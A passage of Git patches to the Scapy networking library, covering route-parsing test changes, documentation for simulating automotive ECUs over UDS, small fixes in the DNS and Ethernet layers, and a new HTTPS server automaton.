mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.unix.in6_getifaddr") -@mock.patch("scapy.arch.unix.os") -def test_osx_10_9_5(mock_os, mock_in6_getifaddr): - """Test read_routes6() on OS X 10.9.5""" - # 'netstat -rn -f inet6' output - netstat_output = u""" -Routing tables - -Internet6: -Destination Gateway Flags Netif Expire -::1 ::1 UHL lo0 -fe80::%lo0/64 fe80::1%lo0 UcI lo0 -fe80::1%lo0 link#1 UHLI lo0 -fe80::%en0/64 link#4 UCI en0 -fe80::ba26:6cff:fe5f:4eee%en0 b8:26:6c:5f:4e:ee UHLWIi en0 -fe80::bae8:56ff:fe45:8ce6%en0 b8:e8:56:45:8c:e6 UHLI lo0 -ff01::%lo0/32 ::1 UmCI lo0 -ff01::%en0/32 link#4 UmCI en0 -ff02::%lo0/32 ::1 UmCI lo0 -ff02::%en0/32 link#4 UmCI en0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked in6_getifaddr() output - mock_in6_getifaddr.return_value = [("::1", IPV6_ADDR_LOOPBACK, "lo0"), - ("fe80::ba26:6cff:fe5f:4eee", IPV6_ADDR_LINKLOCAL, "en0")] - # Test the function - from scapy.arch.unix import read_routes6 - scapy.arch.unix.DARWIN = False - scapy.arch.unix.FREEBSD = True - scapy.arch.unix.NETBSD = False - scapy.arch.unix.OPENBSD = False - routes = read_routes6() - for r in routes: - print(r) - assert len(routes) == 6 - assert check_mandatory_ipv6_routes(routes) - -test_osx_10_9_5() - - -= Mac OS X 10.9.5 with global IPv6 connectivity -~ mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.unix.in6_getifaddr") -@mock.patch("scapy.arch.unix.os") -def test_osx_10_9_5_global(mock_os, mock_in6_getifaddr): - """Test read_routes6() on OS X 10.9.5 with an IPv6 connectivity""" - # 'netstat -rn -f inet6' output - netstat_output = u""" -Routing tables - -Internet6: -Destination Gateway Flags Netif Expire -default fe80::ba26:8aff:fe5f:4eef%en0 UGc en0 -::1 ::1 UHL lo0 -2a01:ab09:7d:1f01::/64 link#4 UC en0 -2a01:ab09:7d:1f01:420:205c:9fab:5be7 b8:e9:55:44:7c:e5 UHL lo0 -2a01:ab09:7d:1f01:ba26:8aff:fe5f:4eef b8:26:8a:5f:4e:ef UHLWI en0 -2a01:ab09:7d:1f01:bae9:55ff:fe44:7ce5 b8:e9:55:44:7c:e5 UHL lo0 -fe80::%lo0/64 fe80::1%lo0 UcI lo0 -fe80::1%lo0 link#1 UHLI lo0 -fe80::%en0/64 link#4 UCI en0 -fe80::5664:d9ff:fe79:4e00%en0 54:64:d9:79:4e:0 UHLWI en0 -fe80::6ead:f8ff:fe74:945a%en0 6c:ad:f8:74:94:5a UHLWI en0 -fe80::a2f3:c1ff:fec4:5b50%en0 a0:f3:c1:c4:5b:50 UHLWI en0 -fe80::ba26:8aff:fe5f:4eef%en0 b8:26:8a:5f:4e:ef UHLWIir en0 -fe80::bae9:55ff:fe44:7ce5%en0 b8:e9:55:44:7c:e5 UHLI lo0 -ff01::%lo0/32 ::1 UmCI lo0 -ff01::%en0/32 link#4 UmCI en0 -ff02::%lo0/32 ::1 UmCI lo -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked in6_getifaddr() output - mock_in6_getifaddr.return_value = [("::1", IPV6_ADDR_LOOPBACK, "lo0"), - ("fe80::ba26:6cff:fe5f:4eee", IPV6_ADDR_LINKLOCAL, "en0")] - # Test the function - from scapy.arch.unix import read_routes6 - routes = read_routes6() - print(routes) - assert valid_output_read_routes6(routes) - for r in routes: - print(r) - assert len(routes) == 11 - assert check_mandatory_ipv6_routes(routes) - -test_osx_10_9_5_global() - - -= Mac OS X 10.10.4 -~ mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.unix.in6_getifaddr") -@mock.patch("scapy.arch.unix.os") -def test_osx_10_10_4(mock_os, mock_in6_getifaddr): - """Test read_routes6() on OS X 10.10.4""" - # 'netstat -rn -f inet6' output - netstat_output = u""" -Routing tables - -Internet6: -Destination Gateway Flags Netif Expire -::1 ::1 UHL lo0 -fe80::%lo0/64 fe80::1%lo0 UcI lo0 -fe80::1%lo0 link#1 UHLI lo0 -fe80::%en0/64 link#4 UCI en0 -fe80::a00:27ff:fe9b:c965%en0 8:0:27:9b:c9:65 UHLI lo0 -ff01::%lo0/32 ::1 UmCI lo0 -ff01::%en0/32 link#4 UmCI en0 -ff02::%lo0/32 ::1 UmCI lo0 -ff02::%en0/32 link#4 UmCI en0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked in6_getifaddr() output - mock_in6_getifaddr.return_value = [("::1", IPV6_ADDR_LOOPBACK, "lo0"), - ("fe80::a00:27ff:fe9b:c965", IPV6_ADDR_LINKLOCAL, "en0")] - # Test the function - from scapy.arch.unix import read_routes6 - routes = read_routes6() - for r in routes: - print(r) - assert len(routes) == 5 - assert check_mandatory_ipv6_routes(routes) - -test_osx_10_10_4() - - -= FreeBSD 10.2 -~ mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.unix.in6_getifaddr") -@mock.patch("scapy.arch.unix.os") -def test_freebsd_10_2(mock_os, mock_in6_getifaddr): - """Test read_routes6() on FreeBSD 10.2""" - # 'netstat -rn -f inet6' output - netstat_output = u""" -Routing tables - -Internet6: -Destination Gateway Flags Netif Expire -::/96 ::1 UGRS lo0 -::1 link#2 UH lo0 -::ffff:0.0.0.0/96 ::1 UGRS lo0 -fe80::/10 ::1 UGRS lo0 -fe80::%lo0/64 link#2 U lo0 -fe80::1%lo0 link#2 UHS lo0 -ff01::%lo0/32 ::1 U lo0 -ff02::/16 ::1 UGRS lo0 -ff02::%lo0/32 ::1 U lo0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked in6_getifaddr() output - mock_in6_getifaddr.return_value = [("::1", IPV6_ADDR_LOOPBACK, "lo0")] - # Test the function - from scapy.arch.unix import read_routes6 - routes = read_routes6() - scapy.arch.unix.DARWIN = False - scapy.arch.unix.FREEBSD = True - scapy.arch.unix.NETBSD = False - scapy.arch.unix.OPENBSD = False - for r in routes: - print(r) - assert len(routes) == 3 - assert check_mandatory_ipv6_routes(routes) - -test_freebsd_10_2() - - -= FreeBSD 13.0 -~ mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.get_if_addr") -@mock.patch("scapy.arch.unix.os") -def test_freebsd_13(mock_os, mock_get_if_addr): - """Test read_routes() on FreeBSD 13""" - # 'netstat -rnW -f inet' output - netstat_output = u""" -Routing tables - -Internet: -Destination Gateway Flags Nhop# Mtu Netif Expire -default 10.0.0.1 UGS 3 1500 vtnet0 -10.0.0.0/24 link#1 U 2 1500 vtnet0 -10.0.0.8 link#2 UHS 1 16384 lo0 -127.0.0.1 link#2 UH 1 16384 lo0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked get_if_addr() behavior - def se_get_if_addr(iface): - """Perform specific side effects""" - if iface == "vtnet0": - return "10.0.0.1" - return "1.2.3.4" - mock_get_if_addr.side_effect = se_get_if_addr - # Test the function - from scapy.arch.unix import read_routes - routes = read_routes() - scapy.arch.unix.DARWIN = False - scapy.arch.unix.FREEBSD = True - scapy.arch.unix.NETBSD = False - scapy.arch.unix.OPENBSD = False - for r in routes: - print(r) - assert r[3] in ["vtnet0", "lo0"] - assert len(routes) == 4 - -test_freebsd_13() - - -= OpenBSD 5.5 -~ mock_read_routes_bsd - -from unittest import mock -from io import StringIO - -@mock.patch("scapy.arch.unix.OPENBSD") -@mock.patch("scapy.arch.unix.in6_getifaddr") -@mock.patch("scapy.arch.unix.os") -def test_openbsd_5_5(mock_os, mock_in6_getifaddr, mock_openbsd): - """Test read_routes6() on OpenBSD 5.5""" - # 'netstat -rn -f inet6' output - netstat_output = u""" -Routing tables - -Internet6: -Destination Gateway Flags Refs Use Mtu Prio Iface -::/104 ::1 UGRS 0 0 - 8 lo0 -::/96 ::1 UGRS 0 0 - 8 lo0 -::1 ::1 UH 14 0 33144 4 lo0 -::127.0.0.0/104 ::1 UGRS 0 0 - 8 lo0 -::224.0.0.0/100 ::1 UGRS 0 0 - 8 lo0 -::255.0.0.0/104 ::1 UGRS 0 0 - 8 lo0 -::ffff:0.0.0.0/96 ::1 UGRS 0 0 - 8 lo0 -2002::/24 ::1 UGRS 0 0 - 8 lo0 -2002:7f00::/24 ::1 UGRS 0 0 - 8 lo0 -2002:e000::/20 ::1 UGRS 0 0 - 8 lo0 -2002:ff00::/24 ::1 UGRS 0 0 - 8 lo0 -fe80::/10 ::1 UGRS 0 0 - 8 lo0 -fe80::%em0/64 link#1 UC 0 0 - 4 em0 -fe80::a00:27ff:fe04:59bf%em0 08:00:27:04:59:bf UHL 0 0 - 4 lo0 -fe80::%lo0/64 fe80::1%lo0 U 0 0 - 4 lo0 -fe80::1%lo0 link#3 UHL 0 0 - 4 lo0 -fec0::/10 ::1 UGRS 0 0 - 8 lo0 -ff01::/16 ::1 UGRS 0 0 - 8 lo0 -ff01::%em0/32 link#1 UC 0 0 - 4 em0 -ff01::%lo0/32 fe80::1%lo0 UC 0 0 - 4 lo0 -ff02::/16 ::1 UGRS 0 0 - 8 lo0 -ff02::%em0/32 link#1 UC 0 0 - 4 em0 -ff02::%lo0/32 fe80::1%lo0 UC 0 0 - 4 lo0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - - # Mocked in6_getifaddr() output - mock_in6_getifaddr.return_value = [("::1", IPV6_ADDR_LOOPBACK, "lo0"), - ("fe80::a00:27ff:fe04:59bf", IPV6_ADDR_LINKLOCAL, "em0")] - # Mocked OpenBSD parsing behavior - mock_openbsd = True - # Test the function - from scapy.arch.unix import read_routes6 - routes = read_routes6() - for r in routes: - print(r) - assert len(routes) == 5 - assert check_mandatory_ipv6_routes(routes) - -test_openbsd_5_5() - - -= NetBSD 7.0 -~ mock_read_routes_bsd - -@mock.patch("scapy.arch.unix.NETBSD") -@mock.patch("scapy.arch.unix.in6_getifaddr") -@mock.patch("scapy.arch.unix.os") -def test_netbsd_7_0(mock_os, mock_in6_getifaddr, mock_netbsd): - """Test read_routes6() on NetBSD 7.0""" - # 'netstat -rn -f inet6' output - netstat_output = u""" -Routing tables - -Internet6: -Destination Gateway Flags Refs Use Mtu Interface -::/104 ::1 UGRS - - - lo0 -::/96 ::1 UGRS - - - lo0 -::1 ::1 UH - - 33648 lo0 -::127.0.0.0/104 ::1 UGRS - - - lo0 -::224.0.0.0/100 ::1 UGRS - - - lo0 -::255.0.0.0/104 ::1 UGRS - - - lo0 -::ffff:0.0.0.0/96 ::1 UGRS - - - lo0 -2001:db8::/32 ::1 UGRS - - - lo0 -2002::/24 ::1 UGRS - - - lo0 -2002:7f00::/24 ::1 UGRS - - - lo0 -2002:e000::/20 ::1 UGRS - - - lo0 -2002:ff00::/24 ::1 UGRS - - - lo0 -fe80::/10 ::1 UGRS - - - lo0 -fe80::%wm0/64 link#1 UC - - - wm0 -fe80::acd1:3989:180e:fde0 08:00:27:a1:64:d8 UHL - - - lo0 -fe80::%lo0/64 fe80::1 U - - - lo0 -fe80::1 link#2 UHL - - - lo0 -ff01:1::/32 link#1 UC - - - wm0 -ff01:2::/32 ::1 UC - - - lo0 -ff02::%wm0/32 link#1 UC - - - wm0 -ff02::%lo0/32 ::1 UC - - - lo0 -""" - # Mocked file descriptor - strio = StringIO(netstat_output) - mock_os.popen = mock.MagicMock(return_value=strio) - # Mocked in6_getifaddr() output - mock_in6_getifaddr.return_value = [("::1", IPV6_ADDR_LOOPBACK, "lo0"), - ("fe80::acd1:3989:180e:fde0", IPV6_ADDR_LINKLOCAL, "wm0")] - # Test the function - from scapy.arch.unix import read_routes6 - routes = read_routes6() - for r in routes: - print(r) - assert len(routes) == 5 - assert check_mandatory_ipv6_routes(routes) - -test_netbsd_7_0() - - ############ ############ + Mocked route() calls @@ -3765,16 +3399,6 @@ finally: conf.route6.resync() conf.ifaces.reload() -= Find a link-local address when conf.iface does not support IPv6 - -old_iface = conf.iface -conf.route6.ipv6_ifaces = set(['eth1', 'lo']) -conf.iface = "eth0" -conf.route6.routes = [("fe80::", 64, "::", "eth1", ["fe80::a00:28ff:fe07:1980"], 256), ("::1", 128, "::", "lo", ["::1"], 0), ("fe80::a00:28ff:fe07:1980", 128, "::", "lo", ["::1"], 0)] -assert conf.route6.route("fe80::2807") == ("eth1", "fe80::a00:28ff:fe07:1980", "::") -conf.iface = old_iface -conf.route6.resync() - = Windows: reset routes properly if WINDOWS: diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 2dda726bcc6..206ab975c8a 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -2002,7 +2002,9 @@ from scapy.layers.inet6 import _ICMPv6Error assert _ICMPv6Error().guess_payload_class(None) == IPerror6 assert _ICMPv6Error().hashret() == b'' -= Windows: reset routes properly += reset routes properly + +conf.ifaces.reload() if WINDOWS: from scapy.arch.windows import _route_add_loopback diff --git a/test/tuntap.uts b/test/tuntap.uts index d97fc65e448..d052276cf30 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -80,8 +80,7 @@ if not LINUX: import subprocess -iface = resolve_iface("tun0") # test TunTapInterface on NetworkInterface -tun0 = TunTapInterface(iface, strip_packet_info=False) +tun0 = TunTapInterface("tun0", strip_packet_info=False) assert subprocess.check_call(["ip", "link", "set", "tun0", "up"]) == 0 assert subprocess.check_call([ From 32b18410cf83caefe910e2bdad2130d8ce9c7fbd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 12 Aug 2024 15:04:01 +0200 Subject: [PATCH 1352/1632] Add Ecu automaton documentation --- doc/scapy/layers/automotive.rst | 280 ++++++++++++++++++++++++++++++++ 1 file changed, 280 insertions(+) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 6adb749b1f0..6abee5daa66 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -1532,6 +1532,286 @@ Once you have obtained a SecOC packet from a socket or a PCAP file, you can use print("Message verified") + +Simulating ECUs and Security Functions +======================================= + + +Modeling an ECU as an Automaton +------------------------------- + +To begin, we need to power cycle our simulated ECU by creating a simple automaton with two states: ON and OFF. +Before building the actual ECU automaton, we require a power supply interface. + +Power Supply +------------ + +The power supply object serves as the interface to power cycle our ECU automaton. It enables communication between the +automaton and the power supply to accurately simulate the ECU's power consumption. +For multiprocessing support, file descriptors and multiprocessing Values are used. Here’s how to set it up: + +.. code-block:: python + + import logging + import sys + from multiprocessing import Value, Pipe + from multiprocessing.sharedctypes import Synchronized + + logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) + + class AutomatonPowerSupply(): + def __init__(self) -> None: + super().__init__() + self.logger = logging.getLogger("AutomatonPowerSupply") + self.logger.info("Init done") + self.voltage_on: Synchronized[int] = Value("i", 0) + self.current_noise: Synchronized[int] = Value("i", 0) + self.current_on: Synchronized[int] = Value("i", 0) + self.delay_off = 0.001 + self.delay_on = 0.001 + self.read_pipe, self.write_pipe = Pipe() + self.closed = False + + def on(self) -> None: + self.logger.debug("ON") + with self.voltage_on.get_lock(): + self.voltage_on.value = 12 + self.write_pipe.send(b"1") + + def off(self) -> None: + self.logger.debug("OFF") + with self.voltage_on.get_lock(): + self.voltage_on.value = 0 + self.write_pipe.send(b"0") + + def close(self) -> None: + if self.closed: + return + self.closed = True + self.read_pipe.close() + self.write_pipe.close() + + def reset(self) -> None: + self.off() + time.sleep(self.delay_off) + self.on() + time.sleep(self.delay_on) + +This code establishes the power supply, enabling it to control the power state of the ECU automaton. +The `on`, `off`, and `reset` methods manage state transitions, while `Pipe` and `Value` ensure inter-process +communication and synchronization. This setup guarantees accurate modeling and control of the ECU's power +consumption within a multiprocessing environment. + +ECU Automaton +------------- + +Now that we have a power supply, we can start modeling our ECU automaton, which can be turned on and off. + +.. code-block:: python + + from typing import Optional, List, IO, Type, Any + from scapy.automaton import Automaton, ATMT + + class EcuAutomaton(Automaton): + def __init__(self, *args: Any, power_supply: AutomatonPowerSupply, **kargs: Any) -> None: + self.power_supply = power_supply + super().__init__(*args, + external_fd={"power_supply_fd": self.power_supply.read_pipe.fileno()}, + **kargs) + + @ATMT.state(initial=1) # type: ignore + def ECU_OFF(self) -> None: + pass + + @ATMT.state() # type: ignore + def ECU_ON(self) -> None: + pass + + # ====== POWER HANDLING ========== + @ATMT.ioevent(ECU_OFF, name="power_supply_fd") # type: ignore + def event_voltage_changed_on(self, fd: IO[bytes]) -> None: + new_voltage = fd.read(1) + if new_voltage == b"1": + raise self.ECU_ON() + + @ATMT.ioevent(ECU_ON, name="power_supply_fd") # type: ignore + def event_voltage_changed_off(self, fd: IO[bytes]) -> None: + new_voltage = fd.read(1) + if new_voltage == b"0": + raise self.ECU_OFF() + + @ATMT.action(event_voltage_changed_on) # type: ignore + def action_consumption_on(self) -> None: + self.debug(1, "Consuming energy ON") + with self.power_supply.current_on.get_lock(): + self.power_supply.current_on.value = 1 + + @ATMT.action(event_voltage_changed_off) # type: ignore + def action_consumption_off(self) -> None: + self.debug(1, "Consuming energy OFF") + with self.power_supply.current_on.get_lock(): + self.power_supply.current_on.value = 0 + +This code defines an `EcuAutomaton` class that models an ECU with two states: ON and OFF. It uses Scapy's automaton +framework to handle the state transitions based on the power supply's status. The `event_voltage_changed_on` and +`event_voltage_changed_off` methods listen for voltage changes to switch states, while `action_consumption_on` and +`action_consumption_off` manage the power consumption behavior. This setup allows for a robust simulation of an ECU's +power cycling behavior. + +Let's give it a shot: + +.. code-block:: python + + import threading + import time + from scapy.contrib.cansocket import NativeCANSocket + from scapy.error import log_runtime + + ps = AutomatonPowerSupply() + cs = NativeCANSocket("vcan0") + automaton = EcuAutomaton(debug=1, power_supply=ps, sock=cs) + automaton.runbg() + + ps.on() + time.sleep(0.1) + print(f"Current consumption {ps.current_on.value}") + ps.off() + time.sleep(0.1) + print(f"Current consumption {ps.current_on.value}") + + automaton.stop() + +This code sets up and tests our ECU automaton. We import the necessary modules and initialize the power supply and +CAN socket. We then create an instance of `EcuAutomaton` with debugging enabled, and run it in the background. + +We power on the ECU and wait a bit to let it stabilize. Then, we print the current consumption, turn off the power, +wait again, and print the current consumption once more. Finally, we stop the automaton. + +By running this code, you should see the current consumption values change as the ECU powers on and off, demonstrating +our automaton in action. + +Simulating UDS +-------------- + +Next up, we want to communicate with our automaton over UDS (Unified Diagnostic Services), aiming to implement +complex state machines like Security Access. Let's start with a simpler example. The following function allows +us to receive and send packets from the automaton's socket, as provided in the `init` function. + +.. code-block:: python + + class EcuAutomaton(Automaton): + + # Existing states and transitions + + @ATMT.receive_condition(ECU_ON) # type: ignore + def on_pkt_on_received_ON(self, pkt: Packet) -> None: + response = None + if pkt: + if response := self.get_default_uds_response(pkt): + self.my_send(response) + + def get_default_uds_response(self, pkt: Packet) -> Optional[Packet]: + service = bytes(pkt)[0] + length = len(pkt) + sub_function = bytes(pkt)[1] if length > 1 else None + match service, length, sub_function: + case 0x10, 2, 1: + return UDS() / UDS_DSCPR(b"\x01") + case 0x3E, 2, 0: + return UDS() / UDS_TPPR() + case 0x3E, 2, 0x80: + return None + case 0x3E, 2, _: + return UDS() / UDS_NR(requestServiceId=service, + negativeResponseCode="subFunctionNotSupported") + case 0x3E, _, _: + return UDS() / UDS_NR(requestServiceId=service, + negativeResponseCode="incorrectMessageLengthOrInvalidFormat") + case 0x27, _, _: + return UDS() / UDS_NR(requestServiceId=service, + negativeResponseCode="incorrectMessageLengthOrInvalidFormat") + case _: + return UDS() / UDS_NR(requestServiceId=service, negativeResponseCode="serviceNotSupported") + +By using Python's match-case operator, we can craft a very elegant UDS answering machine. ECUs are usually precise +with their negative response codes, and modeling this becomes straightforward with the match operator. For instance, +consider the TesterPresent case. If we receive the correct service, length, and sub-function, we respond positively. +If the sub-function is anything else, we fall through to the negative response case "subFunctionNotSupported". If the +length is incorrect, we return "incorrectMessageLengthOrInvalidFormat". Finally, if the service is unknown, the +function returns "serviceNotSupported". This approach allows us to handle UDS communication effectively and implement +the necessary logic for our ECU automaton. + +Full example: + +.. code-block:: python + + from typing import Optional, List, IO, Type, Any + from scapy.packet import Packet + from scapy.automaton import ATMT, Automaton + from scapy.contrib.automotive.uds import * + from scapy.contrib.isotp import * + + class EcuAutomaton(Automaton): + def __init__(self, *args: Any, power_supply: AutomatonPowerSupply, **kargs: Any) -> None: + self.power_supply = power_supply + super().__init__(*args, + external_fd={"power_supply_fd": self.power_supply.read_pipe.fileno()}, + **kargs) + + @ATMT.state(initial=1) # type: ignore + def ECU_OFF(self) -> None: + pass + + @ATMT.state() # type: ignore + def ECU_ON(self) -> None: + pass + + # ====== POWER HANDLING ========== + @ATMT.ioevent(ECU_OFF, name="power_supply_fd") # type: ignore + def event_voltage_changed_on(self, fd: IO[bytes]) -> None: + new_voltage = fd.read(1) + if new_voltage == b"1": + raise self.ECU_ON() + + @ATMT.ioevent(ECU_ON, name="power_supply_fd") # type: ignore + def event_voltage_changed_off(self, fd: IO[bytes]) -> None: + new_voltage = fd.read(1) + if new_voltage == b"0": + raise self.ECU_OFF() + + @ATMT.action(event_voltage_changed_on) # type: ignore + def action_consumption_on(self) -> None: + self.debug(1, "Consuming energy ON") + with self.power_supply.current_on.get_lock(): + self.power_supply.current_on.value = 1 + + @ATMT.action(event_voltage_changed_off) # type: ignore + def action_consumption_off(self) -> None: + self.debug(1, "Consuming energy OFF") + with self.power_supply.current_on.get_lock(): + self.power_supply.current_on.value = 0 + + @ATMT.receive_condition(ECU_ON) # type: ignore + def on_pkt_on_received(self, pkt: Packet) -> None: + if response := self.get_default_uds_response(pkt): + self.my_send(response) + + def get_default_uds_response(self, pkt: Packet) -> Optional[Packet]: + service = bytes(pkt)[0] + length = len(pkt) + sub_function = bytes(pkt)[1] if length else None + match service, length, sub_function: + case 0x10, 2, 1: + return UDS()/UDS_DSCPR(b"\x01") + case 0x3E, 2, 0: + return UDS() / UDS_TPPR() + case 0x3E, 2, 0x80: + return None + case 0x3E, 2, _: + return UDS() / UDS_NR(requestServiceId=service, + + + Test-Setup Tutorials ==================== From 38073d444bd920e8a839c770b8b675bd74f046a2 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 2 Sep 2024 22:28:53 +0200 Subject: [PATCH 1353/1632] Remove weird un-scapy like default for Ether --- scapy/layers/dns.py | 2 +- scapy/layers/l2.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index eb566f63bdd..e1111eda828 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1666,7 +1666,7 @@ def make_reply(self, req): resp[Ether].src, resp[Ether].dst = None, req[Ether].src else: resp[Ether].src, resp[Ether].dst = ( - None if req[Ether].dst in "ff:ff:ff:ff:ff:ff" else req[Ether].dst, + None if req[Ether].dst == "ff:ff:ff:ff:ff:ff" else req[Ether].dst, req[Ether].src, ) from scapy.layers.inet6 import IPv6 diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 48dfbf5d5fd..8ec52cf446b 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -195,7 +195,7 @@ def __init__(self, name): def i2h(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> str if x is None and pkt is not None: - x = "None (resolved on build)" + x = None return super(DestMACField, self).i2h(pkt, x) def i2m(self, pkt, x): From a5dab9efc50af956cf7eac77e47ef3d884c6eb0d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 2 Sep 2024 22:46:56 +0200 Subject: [PATCH 1354/1632] Add classifier for Python 3.13 support --- pyproject.toml | 1 + 1 file changed, 1 insertion(+) diff --git a/pyproject.toml b/pyproject.toml index dcbfcc6750d..a1b8d2423bd 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -35,6 +35,7 @@ classifiers = [ "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", + "Programming Language :: Python :: 3.13", "Topic :: Security", "Topic :: System :: Networking", "Topic :: System :: Networking :: Monitoring", From 6f0eb89f00ce563597b680be16fd4fbc28098cf6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 3 Sep 2024 00:20:16 +0200 Subject: [PATCH 1355/1632] HTTPS server, better Automaton.spawn (#4520) * HTTPS server, better Automaton.spawn * Note regarding the closure of automatons --- doc/scapy/layers/smb.rst | 2 +- scapy/automaton.py | 38 +++++++++++++++++++++---- scapy/layers/http.py | 52 +++++++++++++++++++++++++++++++++-- scapy/layers/kerberos.py | 4 ++- scapy/layers/ntlm.py | 8 +++++- scapy/themes.py | 2 +- scapy/utils.py | 9 +++--- test/regression.uts | 2 +- test/scapy/layers/http.uts | 2 +- test/scapy/layers/tls/tls.uts | 42 ++++++++++++++-------------- test/scapy/layers/x509.uts | 8 +++--- 11 files changed, 125 insertions(+), 44 deletions(-) diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 787d363e941..0a271d60628 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -125,7 +125,7 @@ Let's re-do the initial example programmatically, by turning off the CLI mode. O ('Users', 'DISKTREE', '')] >>> cli.use('c$') >>> cli.cd(r'Program Files\Microsoft') - >>> >>> names = [x[0] for x in cli.ls()] + >>> names = [x[0] for x in cli.ls()] >>> names ['.', '..', 'EdgeUpdater'] diff --git a/scapy/automaton.py b/scapy/automaton.py index 8db26da0204..cf43472ad18 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -976,6 +976,12 @@ def spawn(cls, :param port: the port to listen to :param bg: background mode? (default: False) + + Note that in background mode, you shall close the TCP server as such:: + + srv = MyAutomaton.spawn(8080, bg=True) + srv.shutdown(socket.SHUT_RDWR) # important + srv.close() """ from scapy.arch import get_if_addr # create server sock and bind it @@ -1000,29 +1006,49 @@ def _run() -> None: # Wait for clients forever try: while True: + atmt_server = None clientsocket, address = ssock.accept() if kwargs.get("verb", True): print(conf.color_theme.gold( "\u2503 Connection received from %s" % repr(address) )) - # Start atmt class with socket - sock = cls.socketcls(clientsocket, cls.pkt_cls) - atmt_server = cls( - sock=sock, - iface=iface, **kwargs - ) + try: + # Start atmt class with socket + if cls.socketcls is not None: + sock = cls.socketcls(clientsocket, cls.pkt_cls) + else: + sock = clientsocket + atmt_server = cls( + sock=sock, + iface=iface, **kwargs + ) + except OSError: + if atmt_server is not None: + atmt_server.destroy() + if kwargs.get("verb", True): + print("X Connection aborted.") + if kwargs.get("debug", 0) > 0: + traceback.print_exc() + continue clients.append((atmt_server, clientsocket)) # start atmt atmt_server.runbg() + # housekeeping + for atmt, clientsocket in clients: + if not atmt.isrunning(): + atmt.destroy() except KeyboardInterrupt: print("X Exiting.") ssock.shutdown(socket.SHUT_RDWR) except OSError: print("X Server closed.") + if kwargs.get("debug", 0) > 0: + traceback.print_exc() finally: for atmt, clientsocket in clients: try: atmt.forcestop(wait=False) + atmt.destroy() except Exception: pass try: diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 565d4181da8..c0eb9aa23c5 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -990,15 +990,15 @@ class HTTP_Server(Automaton): def __init__( self, mech=HTTP_AUTH_MECHS.NONE, - ssp=None, verb=True, + ssp=None, *args, **kwargs, ): self.verb = verb if "sock" not in kwargs: raise ValueError( - "HTTP_Server cannot be started directly ! Use SMB_Server.spawn" + "HTTP_Server cannot be started directly ! Use HTTP_Server.spawn" ) self.ssp = ssp self.authmethod = mech.value @@ -1197,3 +1197,51 @@ def answer(self, pkt): ) / ( "

      404 - Not Found

      " ) + + +class HTTPS_Server(HTTP_Server): + """ + HTTPS server automaton + + This has the same arguments and attributes as HTTP_Server, with the addition of: + + :param sslcontext: an optional SSLContext object. + If used, cert and key are ignored. + :param cert: path to the certificate + :param key: path to the key + """ + + socketcls = None + + def __init__( + self, + mech=HTTP_AUTH_MECHS.NONE, + verb=True, + cert=None, + key=None, + sslcontext=None, + ssp=None, + *args, + **kwargs, + ): + if "sock" not in kwargs: + raise ValueError( + "HTTPS_Server cannot be started directly ! Use HTTPS_Server.spawn" + ) + # wrap socket in SSL + if sslcontext is None: + context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) + context.load_cert_chain(cert, key) + else: + context = sslcontext + kwargs["sock"] = SSLStreamSocket( + context.wrap_socket(kwargs["sock"], server_side=True), + self.pkt_cls, + ) + super(HTTPS_Server, self).__init__( + mech=mech, + verb=verb, + ssp=ssp, + *args, + **kwargs, + ) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 5ad5ce42e16..205c5c362f0 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -1790,7 +1790,9 @@ def m2i(self, pkt, s): # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED return MethodData(val[0].val, _underlayer=pkt), val[1] - elif pkt.errorCode.val in [13, 18, 29, 41, 60]: + elif pkt.errorCode.val in [6, 7, 13, 18, 29, 41, 60]: + # 6: KDC_ERR_C_PRINCIPAL_UNKNOWN + # 